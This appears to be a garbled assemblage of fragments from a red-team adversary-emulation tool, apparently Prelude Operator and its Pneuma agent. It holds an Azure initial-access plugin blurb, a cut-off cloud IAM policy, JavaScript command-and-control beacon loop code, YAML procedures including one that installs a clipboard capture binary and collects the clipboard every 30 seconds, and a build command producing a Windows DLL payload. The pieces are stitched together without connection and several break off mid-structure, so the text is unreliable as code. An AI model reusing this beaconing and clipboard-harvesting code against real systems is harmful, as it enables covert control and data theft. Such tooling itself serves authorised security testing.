<div id="plugin-header" class="profile-heading-container">
    <div class="body">
        <strong class="profile-heading">Initial access on Azure resources</strong>
        <p>
            Use Operator to get initial access on your Azure deployed resources. This will allow you to deploy Pneuma (or PneumaEX for professional license holders) onto
            virtual machines running in Resource Groups on Microsoft Azure.
        </p>
    </div>
</div>
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "ec2:AuthorizeSecurityGroupIngress",
                "ec2:DescribeAddresses",
                "ec2:DescribeImages",
                "ec2:DescribeInstances",
if (task[0] === 'api') {
    if (task[2]) {
        try {
            task[2] = JSON.parse(task[2]);
        } catch (e) {
            throw new Error("Could not parse module params: "+e.toString());
        }
    }
    return runModule(task[0], task[1], task[2] || null);
}
function run(argv) {
    beacon = new Beacon((argv.length > 0) ? (argv[0] || argv) : 'http://localhost:3391', (argv.length > 1) ? argv[1] : 'http');
    while (true) {
        try {
            let tasks = runModule('c2', beacon.contact, {beacon: beacon});
            beacon.Links = tasks.map(task => executeTask(Object.assign(new Instruction(), task, {Pid: beacon.pid})));
        } catch (e) {
            console.log(`Beacon failed. ${e}`)
        }
        console.log(`Sleeping for ${beacon.Sleep} seconds`);
package commands

import (
	"encoding/json"
	"log"
	"os"
	"syscall"
	"unsafe"
)
platforms:
  windows:
    keyword:
      command: api.ps
platforms:
  darwin:
    keyword:
      command: collect.captureClipboard
id: 2897b095-3356-456f-876c-3103f91352ab
metadata:
  version: 1
  authors:
    - khyberspache
  tags:
    - thinktank
name: Capture clipboard using a module
description: |
  Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes.
GOOS=windows CC=x86_64-w64-mingw32-gcc CGO_ENABLED=1 go build --buildmode=c-shared --ldflags='-s -w -X main.key="MYKEYISBESTKEY" -extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"' -o payloads/pneuma.dll main.go; |
//+build cgo

package main

import "C"

import (
	"flag"
	"github.com/preludeorg/pneuma/sockets"
	"github.com/preludeorg/pneuma/util"
	"log"